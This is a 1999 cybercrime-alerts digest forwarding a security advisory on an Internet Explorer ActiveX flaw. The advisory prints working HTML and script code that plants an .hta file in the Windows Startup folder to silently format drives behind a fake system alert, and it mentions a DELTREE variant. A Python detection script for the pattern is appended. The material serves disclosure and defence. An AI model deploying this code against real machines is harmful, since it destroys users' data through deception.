>Mailing-List: list [EMAIL PROTECTED]; contact [EMAIL PROTECTED]
>Date: 30 Aug 1999 07:00:51 -0000
>From: [EMAIL PROTECTED]
>Reply-to: [EMAIL PROTECTED]
>To: [EMAIL PROTECTED]
>Subject: [cybercrime-alerts] Digest Number 27
>
>This e-mail via the CYBERCRIME-ALERTS list at http://theMezz.com/alerts
>
>There is 1 message in this issue.
>
>Message: 1
>   Date: Mon, 30 Aug 1999 02:52:52 -0700
>   From: [EMAIL PROTECTED]
>Subject: Internet Explorer code that formats local drives
>
>The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
>
>Internet Explorer code that formats local drives
>
>------------------------------------------------------------
>
>In a previous article (A flaw in IE 5.0 ActiveX control allows executing programs) we explained how hta (HTML application) code in a web page can be used to attack machines visiting a certain web site.
>We received another dangerous example of this flaw, but in this demonstration the local hard drives are formatted, without the user's intervention or knowledge.
>
>******************************
>
>The following was reported to us by Christian Salvarrey:
>
>Using the following code (note that the code applies for the Spanish Windows '98. In order for it to work on an English Windows '98, certain obvious changes should be applied):
>
><object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
></object>
><SCRIPT>
>scr.Reset();
>scr.Path="C:\\windows\\Menú inicio\\Programas\\Inicio\\automat.hta";
>scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('start /m format a: /q /autotest /u');alert('IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.');</"+"SCRIPT>";
>scr.write();
>
>I was able to format my D: drive, and A: drive. (I didn't test it on my C: drive for obvious reasons).
>
>The code does as follows:
>1) Using START /m (Spanish Win98 version) the program starts minimized, so the user can't see what's going on.
>2) Using the undocumented parameter /AUTOTEST, it's possible to run FORMAT.COM on any drive automatically (without user intervention)
>3) The alert message can say something like "IMPORTANT : Windows is configuring the system. Please do not interrupt this process." so the user pays attention to that first.
>
>This can be used to hide the fact that the minimized window's title says FORMAT, which is the only giveaway in this procedure.
>
>Obviously, this is a very dangerous flaw, since you can FORMAT, or use DELTREE in the C:\MY DOCUMENTS or C:\WINDOWS folders to erase them also.
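A defender-side content check for the pattern the advisory describes, as an added example that is not part of the original advisory or digest: it flags HTML that instantiates either CLSID quoted in the advisory and assigns a `.hta` path under a Startup folder. The function names, verdict labels and both sample documents are assumptions constructed for illustration.

```python
import re

# CLSIDs copied from the advisory's sample; the labels are this example's own.
FLAGGED_CLSIDS = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "object the sample uses to write a file",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "object the sample uses to run a command",
}
CLASSID_RE = re.compile(r"classid\s*=\s*['\"]?\s*clsid:\s*\{?([0-9A-Fa-f-]{36})\}?", re.I)
# A script assigning a quoted literal ending in .hta to some object's Path property.
HTA_PATH_RE = re.compile(r"\.Path\s*=\s*(['\"])([^'\"\r\n]*\.hta)\1", re.I)
# Last folder is a Startup folder: English name plus the Spanish one in the advisory.
STARTUP_RE = re.compile(r"[\\/]+(startup|inicio)[\\/]+[^\\/]+$", re.I)


def scan_html(html):
    """Return a sorted list of finding strings for one HTML document."""
    findings = set()
    for m in CLASSID_RE.finditer(html):
        clsid = m.group(1).upper()
        if clsid in FLAGGED_CLSIDS:
            findings.add(f"clsid {clsid}: {FLAGGED_CLSIDS[clsid]}")
    for m in HTA_PATH_RE.finditer(html):
        path = m.group(2)
        where = "Startup folder" if STARTUP_RE.search(path) else "local path"
        findings.add(f"hta written to {where}: {path}")
    return sorted(findings)


def verdict(html):
    """'block' = flagged CLSID plus Startup .hta; 'review' = any finding; else 'allow'."""
    findings = scan_html(html)
    has_clsid = any(f.startswith("clsid ") for f in findings)
    has_startup = any(f.startswith("hta written to Startup") for f in findings)
    if has_clsid and has_startup:
        return "block"
    return "review" if findings else "allow"


# Constructed samples (not captured traffic); the Doc value is a harmless placeholder.
SAMPLE_SUSPICIOUS = r'''<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<SCRIPT>
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\example.hta";
scr.Doc="<p>placeholder</p>";
</SCRIPT>'''
SAMPLE_BENIGN = '<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>'

if __name__ == "__main__":
    for name, doc in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, verdict(doc), scan_html(doc))
```

The check is a string-level heuristic for a mail or web gateway: script that builds the `classid` or the path by concatenation will not match, so a "review" or "allow" result does not establish that a page is safe.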
